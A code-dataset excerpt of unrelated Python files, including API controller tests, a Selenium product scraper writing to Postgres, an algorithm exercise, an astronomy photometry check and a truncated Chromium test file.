parse_args() -> Tuple[str, str]:\n parser = argparse.ArgumentParser(description=\"Get a file from a list of remote machines\")\n parser.add_argument(\"-file\", type=str, required=True,\n help=\"Path of file to fetch\")\n parser.add_argument(\"-hosts\", type=str, default=\"hosts.txt\",\n help=\"File containing list of hosts\")\n args = parser.parse_args()\n return args.file, args.hosts\n\n\ndef main():\n file, target_hosts = parse_args()\n log = setup_logging()\n solution(file, target_hosts, log)\n\n\nif __name__ == '__main__':\n main()","sub_path":"solutions/sol_14.py","file_name":"sol_14.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"344413267","text":"import json\nfrom unittest import mock\n\nfrom playhouse import test_utils\n\nfrom api_framework.controllers import ListAPIController, RetrieveAPIController\n\nfrom .models import Invoice, Lineitem, proxy, Book\nfrom .schemas import InvoiceSchema, LineitemSchema, BookSchema\n\n\ndef test_fk(db):\n proxy.initialize(db)\n db.create_tables([Lineitem, Invoice])\n\n class LineitemController(ListAPIController):\n modelselect = Lineitem\n schema_class = LineitemSchema\n prefetch = (Invoice, )\n\n Lineitem.create(invoice=Invoice.create(number='1'), name='Foo', amount=432)\n Lineitem.create(invoice=Invoice.create(number='2'), name='Bar', amount=200)\n\n controller = LineitemController()\n\n req = mock.Mock()\n resp = mock.Mock()\n\n with test_utils.count_queries() as counter:\n controller.on_get(req, resp)\n results = json.loads(resp.body)\n assert len(results) == 2\n foo = next(r for r in results if r['name'] == 'Foo')\n assert foo\n assert foo['amount'] == 432\n assert foo['invoice']['number'] == '1'\n\n assert counter.count == 2\n\n\ndef test_list_fk(db):\n proxy.initialize(db)\n db.create_tables([Lineitem, Invoice])\n\n class InvoiceController(RetrieveAPIController):\n modelselect = Invoice\n schema_class = InvoiceSchema\n # prefetch = (Lineitem,)\n\n invoice = Invoice.create(number='123')\n Lineitem.create(invoice=invoice, name='Sproket', amount=1.23)\n Lineitem.create(invoice=invoice, name='Gear', amount=2.00)\n Lineitem.create(invoice=invoice, name='Shaft', amount=3.00)\n Lineitem.create(invoice=invoice, name='Lever', amount=4.00)\n\n req = mock.Mock()\n resp = mock.Mock()\n\n controller = InvoiceController()\n\n with test_utils.count_queries() as counter:\n controller.on_get(req, resp, id=invoice.id)\n results = json.loads(resp.body)\n assert results['number'] == '123'\n assert isinstance(results['lineitems'], list)\n lineitems = results['lineitems']\n assert len(lineitems) == 4\n assert lineitems[0]['name'] == 'Sproket'\n assert counter.count == 2\n\n\ndef test_multi_field_lookup(db):\n proxy.initialize(db)\n db.create_tables([Book])\n\n class BookController(RetrieveAPIController):\n modelselect = Book\n schema_class = BookSchema\n\n def get_object(self, req, title, author):\n return Book.select().where(Book.title==title, Book.author==author).get()\n\n book = Book.create(title='Foo', author='Bar')\n\n req = mock.Mock()\n resp = mock.Mock()\n\n controller = BookController()\n controller.on_get(req, resp, title='Foo', author='Bar')\n results = json.loads(resp.body)\n assert results['title'] == 'Foo'\n assert results['author'] == 'Bar'\n","sub_path":"tests/test_controllers.py","file_name":"test_controllers.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"406464566","text":"class Solution:\n # def trap(self, height: List[int]) -> int:\n def trap(self, height):\n if len(height) < 3:\n return 0\n result = 0\n stack = [0]\n index = 1\n while index < len(height):\n h = height[index]\n while len(stack) > 0 and h > height[stack[-1]]:\n topIndex = stack.pop()\n if len(stack) <= 0:\n break\n minHeight = min(h, height[stack[-1]])\n distance = index - stack[-1] - 1\n volume = distance * (minHeight - height[topIndex])\n result += volume\n stack.append(index)\n index += 1\n return result\n\nsolution = Solution()\nheight = [0,1,0,2,1,0,1,3,2,1,2,1]\nprint(solution.trap(height))\n","sub_path":"Week_01/trap.py","file_name":"trap.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"535907556","text":"# -*- coding: utf-8 -*-\n\nimport gevent.monkey\ngevent.monkey.patch_all()\nimport gevent\nfrom gevent.queue import Queue, Empty\nfrom gevent.lock import BoundedSemaphore\n\nimport os\nfrom dotenv import load_dotenv\n\nBASE_PATH = os.path.dirname(os.path.realpath(__file__))\nDOTENV_PATH = os.path.join(BASE_PATH, '.env')\nload_dotenv(DOTENV_PATH)\n\nimport logging\nimport unittest\nimport re\nimport psycopg2\nimport time\nfrom datetime import datetime\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common import proxy\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import WebDriverException, NoSuchElementException, TimeoutException\nfrom selenium.webdriver.remote.remote_connection import RemoteConnection\n\n\nclass TestSite(unittest.TestCase):\n def setUp(self):\n # initialize logget\n self.logger = logging.getLogger(__name__)\n logger_path = os.getenv('PRODUCT_LOG_PATH', '')\n logger_handler = logging.FileHandler(os.path.join(logger_path, '{}.log'.format(__name__)))\n logger_formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\n logger_handler.setFormatter(logger_formatter)\n self.logger.addHandler(logger_handler)\n self.logger.setLevel(logging.INFO)\n self.logger.propagate = False\n\n self.worker_number = 1\n self.worker_timeout = 30\n self.queue_size = 10\n self.tasks = Queue(maxsize=self.queue_size)\n self.semaphore = BoundedSemaphore(1)\n\n self.base_path = 'https://www.fc-moto.de/epages/fcm.sf/ru_RU/'\n\n self.POSTGRES_DB = os.getenv('POSTGRES_DB', '')\n self.POSTGRES_USER = os.getenv('POSTGRES_USER', '')\n self.POSTGRES_PASSWORD = os.getenv('POSTGRES_PASSWORD', '')\n self.POSTGRES_HOST = os.getenv('POSTGRES_HOST', '')\n self.POSTGRES_PORT = os.getenv('POSTGRES_PORT', 5432)\n\n self.SELENIUM_HUB_URL = os.getenv('SELENIUM_HUB_URL', '')\n self.driver = None\n\n def get_element_by_css_selector(self, driver, selector):\n try:\n element = driver.find_element_by_css_selector(selector)\n except (NoSuchElementException, TimeoutException):\n element = None\n return element\n\n def get_elements_by_css_selector(self, driver, selector):\n try:\n elements = driver.find_elements_by_css_selector(selector)\n except (NoSuchElementException, TimeoutException):\n elements = None\n return elements\n\n def get_product_by_link(self, page_url):\n self.driver = None\n product = None\n\n try:\n self.options = webdriver.ChromeOptions()\n self.options.add_argument('--disable-logging')\n self.options.add_argument('--disable-infobars')\n self.options.add_argument('--disable-extensions')\n self.options.add_argument('--disable-web-security')\n self.options.add_argument('--no-sandbox')\n self.options.add_argument('--headless')\n self.options.add_argument('--window-size=600,480')\n self.options.add_argument('--silent')\n self.options.add_argument('--ignore-certificate-errors')\n self.options.add_argument('--disable-popup-blocking')\n self.options.add_argument('--incognito')\n self.options.add_argument('--lang=ru')\n self.options.add_experimental_option('prefs', {'intl.accept_languages': 'ru_RU'})\n\n # self.capabilities = {\n # 'browserName': 'chrome',\n # 'chromeOptions': {\n # 'useAutomationExtension': False,\n # 'forceDevToolsScreenshot': True,\n # 'directConnect': True,\n # 'args': [\n # # '--start-maximized',\n # '--disable-infobars',\n # '--disable-extensions',\n # '--disable-web-security',\n # # '--disable-gpu',\n # # '--disable-dev-shm-usage',\n # '--no-sandbox',\n # '--headless',\n # '--window-size=600,480',\n # # '--remote-debugging-port=9222',\n # # '--crash-dumps-dir=/tmp',\n # '--silent',\n # '--ignore-certificate-errors',\n # '--disable-popup-blocking',\n # '--incognito',\n # '--lang=ru'\n # ],\n # },\n # 'chrome.prefs': {\n # 'intl.accept_languages': 'ru_RU'\n # }\n # }\n\n\n executor = RemoteConnection(self.SELENIUM_HUB_URL, resolve_ip=False)\n self.driver = webdriver.Remote(command_executor=executor, desired_capabilities=self.options.to_capabilities())\n self.driver.set_page_load_timeout(3*60)\n self.driver.get(page_url)\n\n initial_wait = WebDriverWait(self.driver, 3*60)\n initial_wait.until(\n EC.presence_of_element_located((By.CSS_SELECTOR, '.ContentAreaWrapper'))\n )\n\n # 'Наименование',\n name = self.get_element_by_css_selector(self.driver, '.ICProductVariationArea [itemprop=\"name\"]')\n name = name.text if name else ''\n\n # 'Производитель',\n manufacturer = self.get_element_by_css_selector(self.driver, '.ICProductVariationArea [itemprop=\"manufacturer\"]')\n manufacturer = manufacturer.text if manufacturer else ''\n\n # 'Цвета',\n colors = self.get_element_by_css_selector(self.driver, '.ICVariationSelect .Headline.image .Bold.Value')\n colors = colors.text if colors else ''\n\n # 'Все размеры',\n all_size = self.get_elements_by_css_selector(self.driver, '.ICVariationSelect li > button')\n all_size = set([size.text for size in all_size] if all_size else [])\n\n # 'Неактивные размеры',\n disabled_size = self.get_elements_by_css_selector(self.driver, '.ICVariationSelect li.disabled > button')\n disabled_size = set([size.text for size in disabled_size] if disabled_size else [])\n\n # 'Активные размеры',\n active_size = all_size.difference(disabled_size)\n\n # 'Цена',\n price = self.get_element_by_css_selector(self.driver, '.PriceArea .Price')\n price = price.text if price else ''\n price_cleaned = price.replace(' ', '').replace(',', '.')\n\n # 'Фотография'\n front_picture = self.get_element_by_css_selector(self.driver, '#ICImageMediumLarge')\n front_picture = front_picture.get_attribute('src') if front_picture else ''\n\n activate_second_picture = self.get_element_by_css_selector(self.driver, '#ProductThumbBar > li:nth-child(2) > img')\n\n if activate_second_picture:\n activate_second_picture.click()\n time.sleep(2)\n back_picture = self.get_element_by_css_selector(self.driver, '#ICImageMediumLarge')\n back_picture = back_picture.get_attribute('src') if activate_second_picture and back_picture else ''\n\n # 'Описание'\n description = self.get_element_by_css_selector(self.driver, '.description[itemprop=\"description\"]')\n description_text = description.text if description else ''\n description_html = description.get_attribute('innerHTML') if description else ''\n\n product = {\n 'name': name,\n 'manufacturer': manufacturer,\n 'colors': colors,\n 'all_size': all_size,\n 'disabled_size': disabled_size,\n 'active_size': active_size,\n 'price': price,\n 'price_cleaned': price_cleaned,\n 'front_picture': front_picture,\n 'back_picture': back_picture,\n 'description_text': description_text,\n 'description_html': description_html,\n\n }\n print(product)\n except WebDriverException as e:\n self.logger.exception('Error worker: {worker}, error: {error}'.format(worker=worker, error=str(e)))\n if self.driver:\n self.driver.quit()\n # self.get_product_by_link(page_url)\n except KeyboardInterrupt:\n if self.driver:\n self.driver.quit()\n except Exception as e:\n self.logger.exception(str(e))\n finally:\n if self.driver:\n self.driver.quit()\n return product\n\n def worker(self, n):\n try:\n while True:\n url, category_id, pk = self.tasks.get(timeout=self.worker_timeout)\n with psycopg2.connect(dbname=self.POSTGRES_DB, user=self.POSTGRES_USER, password=self.POSTGRES_PASSWORD, host=self.POSTGRES_HOST, port=self.POSTGRES_PORT) as connection:\n with connection.cursor() as cursor:\n sql_string = \"\"\"\n SELECT\n \"id\",\n \"url\"\n FROM \"product\"\n WHERE \"is_done\" = TRUE;\n \"\"\"\n cursor.execute(sql_string)\n\n if (pk, url,) not in cursor.fetchall():\n product = self.get_product_by_link(url)\n if product:\n sql_string = \"\"\"\n INSERT INTO \"product\"\n (\n \"page_id\",\n \"url\",\n \"name_url\",\n \"back_picture\",\n \"colors\",\n \"description_html\",\n \"description_text\",\n \"front_picture\",\n \"manufacturer\",\n \"name\",\n \"price_cleaned\",\n \"is_done\"\n )\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, TRUE)\n ON CONFLICT (url, page_id) DO UPDATE\n SET\n \"updated_at\"=NOW(),\n \"is_done\" = TRUE,\n \"name_url\" = %s,\n \"back_picture\" = %s,\n \"colors\" = %s,\n \"description_html\" = %s,\n \"description_text\" = %s,\n \"front_picture\" = %s,\n \"manufacturer\" = %s,\n \"name\" = %s,\n \"price_cleaned\" = %s\n RETURNING id;\n \"\"\"\n page_id = pk,\n name_url = url.split('/')[-1][:2044],\n url = url[:2044],\n back_picture = product['back_picture'][:2044],\n colors = product['colors'][:2044],\n description_html = product['description_html'][:5000],\n description_text = product['description_text'][:5000],\n front_picture = product['front_picture'][:2044],\n manufacturer = product['manufacturer'][:2044],\n name = product['name'][:2044],\n price_cleaned = product['price_cleaned'][:2044],\n\n parameters = (\n page_id,\n url,\n name_url,\n back_picture,\n colors,\n description_html,\n description_text,\n front_picture,\n manufacturer,\n name,\n price_cleaned,\n name_url,\n back_picture,\n colors,\n description_html,\n description_text,\n front_picture,\n manufacturer,\n name,\n price_cleaned,\n )\n cursor.execute(sql_string, parameters)\n product_id = cursor.fetchone()[0]\n connection.commit()\n\n if product_id:\n sql_string = \"\"\"\n UPDATE \"page\"\n SET \"is_done\" = TRUE\n WHERE \"id\" = %s;\n \"\"\"\n parameters = (pk, )\n result = cursor.execute(sql_string, parameters)\n\n all_size = product['all_size']\n active_size = product['active_size']\n for size in product['all_size']:\n if size in active_size:\n available = True\n else:\n available = False\n sql_string = \"\"\"\n INSERT INTO \"size\" (\"product_id\", \"available\", \"value\")\n VALUES (%s, %s, %s)\n ON CONFLICT (value, product_id) DO UPDATE\n SET\n \"product_id\" = %s,\n \"available\" = %s,\n \"value\" = %s;\n \"\"\"\n parameters = ( product_id, available, size, product_id, available, size,)\n result = cursor.execute(sql_string, parameters)\n connection.commit()\n\n except Empty:\n print('Worker #{} exited!'.format(n))\n\n def main(self):\n # TODO: join url with page_id in stream, split to parallel routines\n with psycopg2.connect(dbname=self.POSTGRES_DB, user=self.POSTGRES_USER, password=self.POSTGRES_PASSWORD, host=self.POSTGRES_HOST, port=self.POSTGRES_PORT) as connection:\n with connection.cursor() as cursor:\n sql_string = \"\"\"\n SELECT\n \"url\",\n \"category_id\",\n \"id\"\n FROM \"page\"\n WHERE \"is_done\" = FALSE\n ORDER BY RANDOM()\n LIMIT {limit};\n \"\"\".format(limit=self.worker_number*10)\n cursor.execute(sql_string)\n for row in cursor.fetchall():\n url = row[0]\n category_id = row[1]\n pk = row[2]\n self.tasks.put((url, category_id, pk,))\n\n def run_parallel(self):\n gevent.joinall([\n gevent.spawn(self.main),\n *[gevent.spawn(self.worker, n) for n in range(self.worker_number)],\n ])\n\n def test_loop(self):\n try:\n while True:\n self.run_parallel()\n except KeyboardInterrupt:\n if self.driver:\n self.driver.quit()\n finally:\n if self.driver:\n self.driver.quit()\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"product/app/insert.py","file_name":"insert.py","file_ext":"py","file_size_in_byte":17044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"165833296","text":"#greeting = input(\"Hello, possible pirate! What's the password? \")\n#if greeting in [\"Arrr!\"]:\n\t#print(\"Go away, pirate.\")\n#else:\n #print(\"Greetings, hater of pirates!\")\n\n#authors = {\n #\"Charles Dickens\": \"1870\",\n #\"William Thackeray\": \"1863\",\n #\"Anthony Trollope\": \"1882\",\n #\"Gerard Manley Hopkins\": \"1889\"\n#}\n#for author, date in authors.items():\n #print(author + \" died in \" + date)\n\n#year = int(input(\"Greetings! What is your year of origin? \"))\n\n#if year <= 1900:\n #print('Woah, that is the past!')\n#elif year > 1900 and year < 2020:\n #print(\"That is totally the present!\")\n#else:\n #print(\"Far out, that's the future!!\")\n\n#sentence = \"The quick brown fox jumped over the lazy dogs\"\n#longest = \"\"\n\n#words = sentence.split()\n\n#for word in words:\n #if len(word) > len(longest):\n #longest = word\n\n#print(\"The word '\" + longest + \"' is \", len(longest), \" characters long.\")\n\nyears = (100)\npopulation = [0,10]\nfor i in range(years):\n population.append(population[-1] + population[-2])\nprint(population)\n","sub_path":"exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"11469504","text":"import pickle\r\nimport codecs\r\nimport os\r\nclass DataManagement:\r\n filename_now = \"\"\r\n files = []\r\n def insert_db(self, fileinfo):\r\n self.files = self.load()\r\n for file in self.files:\r\n if file[\"filename\"] == fileinfo[\"filename\"]:\r\n return -1\r\n else:\r\n self.files.append(fileinfo)\r\n with codecs.open(self.filename_now, \"wb\") as f:\r\n pickle.dump(self.files, f)\r\n return 1\r\n\r\n def save_db(self, fileinfoes):\r\n with codecs.open(self.filename_now, \"wb\") as f:\r\n pickle.dump(fileinfoes, f)\r\n\r\n def query_db(self, fpath=\"\"):\r\n self.files = self.load()\r\n if fpath:\r\n for i, file in enumerate(self.files):\r\n if file[\"filename\"] == fpath:\r\n return i\r\n else:\r\n return -1\r\n def load(self):\r\n pathname = self.filename_now\r\n if not (os.path.exists(pathname) and os.path.isfile(pathname)):\r\n with codecs.open(self.filename_now, \"wb\") as f:\r\n pickle.dump(self.files, f)\r\n with codecs.open(self.filename_now, \"rb\") as f:\r\n files = pickle.load(f)\r\n return files","sub_path":"FileVault/foo/DataManagement.py","file_name":"DataManagement.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"463103932","text":"\"\"\"Auxiliary functions for serving the web page.\n\"\"\"\n\nfrom flask import request\n\nfrom ...core.files import dirContents\n\n\ndef getFormData(web):\n \"\"\"Get form data.\n\n The TF browser user interacts with the web app by clicking and typing,\n as a result of which a HTML form gets filled in.\n This form as regularly submitted to the web server with a request\n for a new incarnation of the page: a response.\n\n The values that come with a request, must be peeled out of the form,\n and stored as logical values.\n\n Most of the data has a known function to the web server,\n but there is also a list of webapp dependent options.\n \"\"\"\n\n form = {}\n\n resetForm = request.form.get(\"resetForm\", \"\")\n form[\"resetForm\"] = resetForm\n\n form[\"sec0\"] = request.form.get(\"sec0\", \"\")\n form[\"sec1\"] = request.form.get(\"sec1\", \"\")\n form[\"sec2\"] = request.form.get(\"sec2\", \"\")\n form[\"annoset\"] = request.form.get(\"annoset\", \"\")\n form[\"rannoset\"] = request.form.get(\"rannoset\", \"\")\n form[\"dannoset\"] = request.form.get(\"dannoset\", \"\")\n form[\"freqsort\"] = request.form.get(\"freqsort\", \"\")\n form[\"kindsort\"] = request.form.get(\"kindsort\", \"\")\n form[\"etxtsort\"] = request.form.get(\"etxtsort\", \"\")\n form[\"sfind\"] = request.form.get(\"sfind\", \"\")\n activeEntity = request.form.get(\"activeentity\", \"\")\n form[\"activeentity\"] = int(activeEntity) if activeEntity else None\n form[\"efind\"] = request.form.get(\"efind\", \"\")\n tSelectStart = request.form.get(\"tselectstart\", \"\")\n form[\"tselectstart\"] = int(tSelectStart) if tSelectStart else None\n tSelectEnd = request.form.get(\"tselectend\", \"\")\n form[\"tselectend\"] = int(tSelectEnd) if tSelectEnd else None\n\n return form\n\n\ndef annoSets(annoDir):\n \"\"\"Get the existing annotation sets.\n\n Parameters\n ----------\n annoDir: string\n The directory under which the distinct annotation sets can be found.\n The names of these subdirectories are the names of the annotation sets.\n\n Returns\n -------\n set\n The annotation sets, sorted by name.\n \"\"\"\n return set(dirContents(annoDir)[1])\n","sub_path":"tf/browser/ner/servelib.py","file_name":"servelib.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"482032890","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\nAuthors\n-------\nJohn Weaver \n\n\nAbout\n-----\nRun standard checks on the photometry\n\nKnown Issues\n------------\nNone\n\n\n\"\"\"\n\n# ------------------------------------------------------------------------------\n# Standard Packages\n# ------------------------------------------------------------------------------\nimport os\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom astropy.io import ascii, fits\nfrom astropy.table import Table\nfrom astropy.coordinates import SkyCoord\nimport adv_tools as adv\nimport astro_tools as astr\nimport astropy.units as u \n\nfrom matplotlib.colors import LogNorm\nimport scipy.stats\n\n# ------------------------------------------------------------------------------\n# Additional Packages\n# ------------------------------------------------------------------------------\n\n\n\n# ------------------------------------------------------------------------------\n# Parameters\n# ------------------------------------------------------------------------------\nfname_cat= '/Volumes/WD4/Current/tractor_pipeline/data/catalogs/master_catalog.fits'\nout_dir= '/Users/jweaver/Projects/Current/COSMOS/tractor_pipeline/figures'\n\n\nfname_vcat = '../../data/external/SPLASH_SXDF_Mehta+_v1.6/SPLASH_SXDF_Mehta+_v1.6.fits'\n# ------------------------------------------------------------------------------\n# Declarations and Functions\n# ------------------------------------------------------------------------------\ncat = Table.read(fname_cat)\n\nvcat = Table.read(fname_vcat)\n\n# ------------------------------------------------------------------------------\n# Main Program\n# ------------------------------------------------------------------------------\n\n# Convert to magnitudes!\nflux_i = cat['hsc_i']\nflux_z = cat['hsc_z']\n\nvmag_i = vcat['MAG_AUTO_hsc_i']\nvmag_z = vcat['MAG_AUTO_hsc_z']\n\nmask = (flux_i != flux_i) & (flux_z != flux_z) | (flux_i < 0) | (flux_z < 0)\nflux_i = flux_i[~mask]\nflux_z = flux_z[~mask]\n\ncat = cat[~mask]\n\nzpt = 23.93\n\nmag_i = - 2.5 * np.log10(flux_i) + zpt\nmag_z = - 2.5 * np.log10(flux_z) + zpt\n\n\nplt.ioff()\n\n# Color-mag plot\ncol1 = mag_i\ncol2 = mag_z\n\nvcol1 = vmag_i\nvcol2 = vmag_z\n\nx, y = cat['x'], cat['y']\nvx, vy = vcat['X_IMAGE'], vcat['Y_IMAGE']\n\nz, vz = np.zeros(len(y)), np.zeros(len(vy))\n\ncoord = SkyCoord(x, y, z, unit='pixel', representation_type='cartesian')\nvcoord = SkyCoord(vx, vy, vz, unit='pixel', representation_type='cartesian')\n\nidx, _, sep = coord.match_to_catalog_3d(vcoord) \nsep = sep.value\n\nthresh = 1.5\ncount = np.sum(sep < thresh)\n\nfig, ax = plt.subplots()\nax.hist(sep, bins=np.arange(0, max(sep), 0.1))\nax.set_xlim(0, 10)\nax.axvline(thresh, linestyle='dotted', color='k')\nax.text(0.7, 0.85, f'N = {count}', transform=ax.transAxes)\nfig.savefig(os.path.join(out_dir, 'separation.png'))\n\nidx_near = sep < thresh\nvidx_near = idx[sep < thresh]\n\ncol1, col2 = col1[idx_near], col2[idx_near]\nvcol1, vcol2 = vcol1[vidx_near], vcol2[vidx_near]\n\nfig, ax = plt.subplots(ncols = 2, sharex=True, sharey=True)\nax[0].plot([0, 100], [0,100], c='grey', ls='dotted', zorder=-1)\nax[1].plot([0, 100], [0,100], c='grey', ls='dotted', zorder=-1)\nax[0].scatter(vcol1, col1, s=0.2, c='purple', alpha=0.2)\nax[0].text(0.1, 0.9, f'N = {len(col1)}', transform=ax[0].transAxes )\nax[1].scatter(vcol2, col2, s=0.2, c='purple', alpha=0.2)\n# ax[1].text(0.1, 0.9 )\n#ax[0].set(xlim=(16,29), ylim=(-5,5))\nax[0].set(xlim=(16,29), ylim=(16,29))\nax[0].set(xlabel='Mehta HSC i (AB)', ylabel='Tractor HSC i (AB)')\nax[1].set(xlabel='Mehta HSC z (AB)', ylabel='Tractor HSC z (AB)')\n\nfig.subplots_adjust(bottom=0.2)\n\nfig.savefig(os.path.join(out_dir, 'master_colcol.png'))\n\n\n# DIFF\n\nminmag, maxmag = 19, 27\nminy, maxy = -0.5, 0.5\n\ndiff1 = col1 - vcol1\ndiff2 = col2 - vcol2\n\ndef mean_confidence_interval(data, confidence=0.34):\n m = np.median(data)\n sdata = np.sort(data)\n hdata = sdata[sdata > m]\n ldata = sdata[sdata < m]\n n_hdata = len(hdata)\n n_ldata = len(ldata)\n hmax = hdata[(np.arange(n_hdata) / n_hdata) < confidence][-1]\n hmin = ldata[::-1][(np.arange(n_ldata) / n_ldata) < confidence][-1]\n return m, hmin, hmax\n\ndef running_med(X, Y, xrange, total_bins):\n bins = np.linspace(xrange[0], xrange[1], total_bins)\n delta = bins[1]-bins[0]\n idx = np.digitize(X,bins)\n foo = np.array([mean_confidence_interval(Y[idx==k]) for k in range(total_bins)])\n running_median, running_std = foo[:,0], np.array((foo[:,1], foo[:,2]))\n Nbins = np.array([np.sum(idx==k) for k in range(total_bins)])\n return Nbins, np.array(bins - delta/2.), running_median, running_std\n\ntotal_bins = 10\nNbins1, rbins1, rmed1, rstd1 = running_med(col1, diff1, xrange=(20, 26.5), total_bins = total_bins)\nNbins2, rbins2, rmed2, rstd2 = running_med(col2, diff2, xrange=(20, 26.5), total_bins = total_bins)\n\nrbins1, rmed1, rstd1 = rbins1[Nbins1 > 1], rmed1[Nbins1 > 1], rstd1[:, Nbins1 > 1]\nrbins2, rmed2, rstd2 = rbins2[Nbins2 > 1], rmed2[Nbins2 > 1], rstd2[:, Nbins2 > 1]\n\nfig, ax = plt.subplots(nrows = 2, sharex=True, sharey=True, figsize=(15, 10))\n\nxbins = np.linspace(minmag, maxmag, 150)\nybins = np.linspace(miny, maxy, int(150 * minmag/maxmag))\n\nopt = dict(bins=[xbins, ybins], range=[[minmag,maxmag], [miny, maxy]], zorder=-1, cmap='Blues', norm=LogNorm())\n\nax[0].axhline(0, linestyle='dashed', c='k')\ncax1 = ax[0].hist2d(col1, diff1, **opt)\nfig.colorbar(cax1[3], ax=ax[0])\nax[0].plot(rbins1, rmed1, c='orange')\nax[0].fill_between(rbins1, rstd1[0], rstd1[1], color='orange', alpha = 0.3)\n\n\nax[1].axhline(0, linestyle='dashed', c='k')\ncax2 = ax[1].hist2d(col2, diff2, **opt)\nfig.colorbar(cax2[3], ax=ax[1])\nax[1].plot(rbins2, rmed2, c='orange')\nax[1].fill_between(rbins2, rstd2[0], rstd2[1], color='orange', alpha = 0.3)\n\nax[0].set_xlim(minmag, maxmag)\nax[0].set_ylim(miny, maxy)\nax[0].text(0.05, 0.9, f'Confidence: 34%', transform=ax[0].transAxes)\n\nax[0].set(xlabel='Mehta HSC i (AB)', ylabel='Tractor - Mehta HSC i (AB)')\nax[1].set(xlabel='Mehta HSC z (AB)', ylabel='Tractor - Mehta HSC z (AB)')\n\nfig.subplots_adjust(right=1.1)\nfig.savefig(os.path.join(out_dir, 'master_diff.png'))\n\n\n\n# Number counts\nfig, ax = plt.subplots(nrows = 2, sharex = True, sharey=True)\nbins = np.arange(16, 29, 0.5)\nax[0].hist(mag_i, histtype='step', bins = bins, label = f'Tractor (N = {len(mag_z)})', density=True, color='royalblue', ls='solid')\nax[1].hist(mag_z, histtype='step', bins = bins, label = 'Tractor', density=True, color='orange', ls='solid')\nax[0].hist(vmag_i, histtype='step', bins = bins, label = f'Mehta (N = {len(vmag_i)})', density=True, color='royalblue', ls='dotted')\nax[1].hist(vmag_z, histtype='step', bins = bins, label = 'Mehta', density=True, color='orange', ls='dotted')\nax[1].set(xlim=(16, 29), ylim=(0,0.4), xlabel='Mag (AB)', ylabel=' Norm count' )\n\nax[0].text( 16.5, 0.32, 'HSC i')\nax[1].text( 16.5, 0.32, 'HSC z')\nax[0].legend(loc=3)\nax[1].legend(loc=3)\n\nfig.subplots_adjust(left = 0.1, bottom=0.2)\nfig.savefig(os.path.join(out_dir, 'master_numcount.png'))\n\n\nfig, ax = plt.subplots()\nax.plot((mag_i - mag_z)[mag_i > 27])\nfig.savefig(os.path.join(out_dir, 'check.pdf'))\n","sub_path":"src/visualization/checkphot.py","file_name":"checkphot.py","file_ext":"py","file_size_in_byte":7097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"69323735","text":"# Copyright (C) 2010 Google Inc. All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# * Neither the name of Google Inc. nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport StringIO\nimport time\nimport unittest\n\nfrom webkitpy.common.system import logtesting\nfrom webkitpy.common.system.executive_mock import MockExecutive2\nfrom webkitpy.common.system.systemhost_mock import MockSystemHost\nfrom webkitpy.layout_tests.port.config_mock import MockConfig\nfrom webkitpy.thirdparty.mock import Mock\nfrom webkitpy.tool.mocktool import MockOptions\n\nimport chromium\nimport chromium_mac\n\nfrom webkitpy.layout_tests.port import chromium_port_testcase\nfrom webkitpy.layout_tests.port.driver import DriverInput\n\n\nclass ChromiumDriverTest(unittest.TestCase):\n def setUp(self):\n host = MockSystemHost()\n options = MockOptions(configuration='Release', additional_drt_flag=['--test-shell'])\n config = MockConfig(filesystem=host.filesystem, default_configuration='Release')\n self.port = chromium_mac.ChromiumMacPort(host, 'chromium-mac-snowleopard', options=options, config=config)\n self.driver = chromium.ChromiumDriver(self.port, worker_number=0, pixel_tests=True)\n\n def 